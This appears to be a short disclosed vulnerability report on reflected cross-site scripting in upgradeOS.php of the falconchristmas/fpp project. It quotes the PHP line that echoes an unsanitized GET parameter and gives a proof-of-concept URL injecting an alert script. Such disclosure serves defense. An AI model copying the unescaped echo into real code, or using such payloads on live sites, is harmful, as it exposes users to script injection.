Cross-site Scripting (XSS) - Reflected in falconchristmas/fpp
Valid
Reported on
May 29th 2021
✍️ Description
An XSS vulnerability is present in https://github.com/FalconChristmas/fpp/blob/f032d800a67ed280f8d577d95519a71c95114579/www/upgradeOS.php#L26 due to absence of user input sanitization :
Image: <? echo $_GET['os']; ?><br>
🕵️♂️ Proof of Concept
Visit http://127.0.0.1/upgradeOS.php?os=%3Cscript%3Ealert(%27zer0h%27)%3C/script%3E
💥 Impact
XSS
Occurrences
to join this conversation